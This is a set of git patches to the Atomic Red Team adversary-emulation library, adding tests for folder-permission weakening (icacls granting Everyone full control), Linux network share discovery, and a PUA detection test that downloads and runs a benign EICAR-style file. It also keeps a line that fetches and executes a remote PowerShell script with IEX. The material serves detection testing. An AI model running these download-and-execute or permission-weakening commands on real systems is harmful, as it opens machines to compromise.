prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 + +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 + +' name: command_prompt elevation_required: true T1220: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 576c3ad0..def6c2c7 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer. | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| +| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer. icacls "#{path}" /grant Everyone:F /T /C /Q ``` +#### Cleanup Commands: +```cmd +icacls '#{path}' /restore #{file_path} /q >nul 2>&1 +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Backup of original folder permissions should exist (for use in cleanup commands) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +icacls #{path} /save #{file_path} /t /q >nul 2>&1 +``` + +
From 8d0a5c454cf5bf5114685da572ee54d74b6c237f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 19 May 2021 23:05:14 -0600 Subject: [PATCH 11/16] Bump nokogiri from 1.11.1 to 1.11.4 (#1472) Bumps [nokogiri](https://github.com/sparklemotion/nokogiri) from 1.11.1 to 1.11.4. - [Release notes](https://github.com/sparklemotion/nokogiri/releases) - [Changelog](https://github.com/sparklemotion/nokogiri/blob/main/CHANGELOG.md) - [Commits](https://github.com/sparklemotion/nokogiri/compare/v1.11.1...v1.11.4) Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Carrie Roberts --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 96f60456..68078e7a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -208,14 +208,14 @@ GEM rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) - mini_portile2 (2.5.0) + mini_portile2 (2.5.1) minima (2.5.1) jekyll (>= 3.5, < 5.0) jekyll-feed (~> 0.9) jekyll-seo-tag (~> 2.1) minitest (5.14.2) multipart-post (2.1.1) - nokogiri (1.11.1) + nokogiri (1.11.4) mini_portile2 (~> 2.5.0) racc (~> 1.4) octokit (4.19.0) From 518aad427a128679d9f13105dcd41867f008c841 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 21 May 2021 19:40:03 +0000 Subject: [PATCH 12/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1135/T1135.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 5590660e..d7558832 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -19,6 +19,7 @@ atomic_tests: showmount #{computer_name} name: sh - name: Network Share Discovery - linux + auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: | Network Share Discovery using smbstatus supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index d80b426b..126a8e7e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -693,3 +693,4 @@ e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 86fc3f40-237f-4701-b155-81c01c48d697 +875805bc-9e86-4e87-be86-3a5527315cae From 4211b2b417f7dce1e1ad67c376b6d83faa59d3b1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 21 May 2021 19:40:10 +0000 Subject: [PATCH 13/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 9 +-- atomics/Indexes/Indexes-CSV/linux-index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 8 +-- atomics/Indexes/Indexes-Markdown/index.md | 11 ++-- .../Indexes/Indexes-Markdown/linux-index.md | 2 +- .../Indexes/Indexes-Markdown/macos-index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 8 +-- atomics/Indexes/index.yaml | 33 +++++++++- atomics/T1135/T1135.md | 62 ++++++++++++++++--- 9 files changed, 107 insertions(+), 30 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ef068f6f..bf58f74a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -643,10 +643,11 @@ discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7b discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 0f865aa6..906a2291 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -136,7 +136,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh -discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index aed4c67a..f319c380 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -456,10 +456,10 @@ discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Lo discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d3f145a5..f688cf81 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1124,11 +1124,12 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #1: Network Share Discovery [macos] + - Atomic Test #2: Network Share Discovery - linux [linux] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - Atomic Test #2: Packet Capture macOS [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4df39794..18f9130e 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -408,7 +408,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #2: Network Share Discovery - linux [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 35ba3e08..ebfb40df 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -353,7 +353,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #1: Network Share Discovery [macos] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #2: Packet Capture macOS [macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c3d3acfa..bd58176c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -829,10 +829,10 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4b5c3fb2..0f121130 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47559,7 +47559,6 @@ discovery: ' supported_platforms: - macos - - linux input_arguments: computer_name: description: Computer name to find a mount on. @@ -47571,6 +47570,38 @@ discovery: smbutil view -g //#{computer_name} showmount #{computer_name} name: sh + - name: Network Share Discovery - linux + auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae + description: 'Network Share Discovery using smbstatus + +' + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. Debian - dpkg -s samba + type: string + default: rpm -q samba + package_installer: + description: Package installer command. Debian - apt install samba + type: string + default: yum install -y samba + dependency_executor_name: bash + dependencies: + - description: 'Package with smbstatus (samba) must exist on device + +' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + +' + get_prereq_command: "sudo #{package_installer} \n" + executor: + command: 'smbstatus --shares + +' + name: bash + elevation_require: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 2170b0ed..709cdd61 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -8,13 +8,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik - [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery) -- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt) +- [Atomic Test #2 - Network Share Discovery - linux](#atomic-test-2---network-share-discovery---linux) -- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell) +- [Atomic Test #3 - Network Share Discovery command prompt](#atomic-test-3---network-share-discovery-command-prompt) -- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives) +- [Atomic Test #4 - Network Share Discovery PowerShell](#atomic-test-4---network-share-discovery-powershell) -- [Atomic Test #5 - Share Discovery with PowerView](#atomic-test-5---share-discovery-with-powerview) +- [Atomic Test #5 - View available share drives](#atomic-test-5---view-available-share-drives) + +- [Atomic Test #6 - Share Discovery with PowerView](#atomic-test-6---share-discovery-with-powerview)
@@ -22,7 +24,7 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik ## Atomic Test #1 - Network Share Discovery Network Share Discovery -**Supported Platforms:** macOS, Linux +**Supported Platforms:** macOS @@ -50,7 +52,49 @@ showmount #{computer_name}

-## Atomic Test #2 - Network Share Discovery command prompt +## Atomic Test #2 - Network Share Discovery - linux +Network Share Discovery using smbstatus + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba| +| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| + + +#### Attack Commands: Run with `bash`! + + +```bash +smbstatus --shares +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Package with smbstatus (samba) must exist on device +##### Check Prereq Commands: +```bash +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +sudo #{package_installer} +``` + + + + +
+
+ +## Atomic Test #3 - Network Share Discovery command prompt Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session @@ -80,7 +124,7 @@ net view \\#{computer_name}

-## Atomic Test #3 - Network Share Discovery PowerShell +## Atomic Test #4 - Network Share Discovery PowerShell Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session @@ -105,7 +149,7 @@ get-smbshare

-## Atomic Test #4 - View available share drives +## Atomic Test #5 - View available share drives View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session **Supported Platforms:** Windows @@ -129,7 +173,7 @@ net share

-## Atomic Test #5 - Share Discovery with PowerView +## Atomic Test #6 - Share Discovery with PowerView Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. **Supported Platforms:** Windows From e8dcc043a0203fa1e4e2d2e628ff2a562381fb22 Mon Sep 17 00:00:00 2001 From: Michael Boman Date: Fri, 21 May 2021 21:41:41 +0200 Subject: [PATCH 14/16] T1204.002 (#1476) * Added T1204.002 test, with https://demo.wd.microsoft.com/Page/PUA test * Make download URL configurable (so it can be mirrored locally). Execure pua-file properly (& powershell syntax) * Spell Remove-Item correctly... * prereqs check should be a command, not string * The PUA test-file is not Windows Defender centric, removing all Windows Defender references. * Download the PUA file at test-time to check if PUA is detected when the file is downloaded * remove comment Co-authored-by: Carrie Roberts --- atomics/T1204.002/T1204.002.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 4f2bad32..dd454fde 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -288,3 +288,30 @@ atomic_tests: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell + +- name: Potentially Unwanted Applications (PUA) + description: | + The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + + supported_platforms: + - windows + + input_arguments: + pua_url: + description: url to PotentiallyUnwanted.exe + type: url + default: "http://amtso.eicar.org/PotentiallyUnwanted.exe" + pua_file: + description: path to PotentiallyUnwanted.exe + type: Path + default: "$env:TEMP/PotentiallyUnwanted.exe" + + executor: + name: powershell + elevation_required: false + command: | + Invoke-WebRequest #{pua_url} -OutFile #{pua_file} + & "#{pua_file}" + cleanup_command: | + Remove-Item #{pua_file} + From ca0b91d241afa3a65e5940bf09ef15b81b6cd8c4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 21 May 2021 19:42:17 +0000 Subject: [PATCH 15/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1204.002/T1204.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index dd454fde..971dda55 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -290,6 +290,7 @@ atomic_tests: name: powershell - name: Potentially Unwanted Applications (PUA) + auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: | The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 126a8e7e..e739deb5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -694,3 +694,4 @@ e86f1b4b-fcc1-4a2a-ae10-b49da01458db fcbdd43f-f4ad-42d5-98f3-0218097e2720 86fc3f40-237f-4701-b155-81c01c48d697 875805bc-9e86-4e87-be86-3a5527315cae +02f35d62-9fdc-4a97-b899-a5d9a876d295 From 1c4927003295e30f41598d6048017f571479b964 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 21 May 2021 19:42:23 +0000 Subject: [PATCH 16/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 32 ++++++++++++++++ atomics/T1204.002/T1204.002.md | 37 +++++++++++++++++++ 6 files changed, 73 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index bf58f74a..d296f349 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -734,6 +734,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f319c380..d9ef501a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -536,6 +536,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f688cf81..815d45b6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1329,6 +1329,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bd58176c..803162e4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -982,6 +982,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0f121130..107864b9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -54525,6 +54525,38 @@ execution: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell + - name: Potentially Unwanted Applications (PUA) + auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 + description: 'The Potentially Unwanted Applications (PUA) protection feature + in antivirus software can identify and block PUAs from downloading and installing + on endpoints in your network. These applications are not considered viruses, + malware, or other types of threats, but might perform actions on endpoints + that adversely affect their performance or use. This file is similar to EICAR + test virus file, but is considered a Potentially Unwanted Application (PUA) + instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify + anti-pua protection). + +' + supported_platforms: + - windows + input_arguments: + pua_url: + description: url to PotentiallyUnwanted.exe + type: url + default: http://amtso.eicar.org/PotentiallyUnwanted.exe + pua_file: + description: path to PotentiallyUnwanted.exe + type: Path + default: "$env:TEMP/PotentiallyUnwanted.exe" + executor: + name: powershell + elevation_required: false + command: | + Invoke-WebRequest #{pua_url} -OutFile #{pua_file} + & "#{pua_file}" + cleanup_command: 'Remove-Item #{pua_file} + +' T1204.001: technique: created: '2020-03-11T14:43:31.706Z' diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index 340a7a23..eda78a1e 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -22,6 +22,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently - [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba) +- [Atomic Test #8 - Potentially Unwanted Applications (PUA)](#atomic-test-8---potentially-unwanted-applications-pua) +
@@ -424,4 +426,39 @@ Write-Host "You will need to install Google Chrome manually to meet this require +
+
+ +## Atomic Test #8 - Potentially Unwanted Applications (PUA) +The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe| +| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-WebRequest #{pua_url} -OutFile #{pua_file} +& "#{pua_file}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{pua_file} +``` + + + + +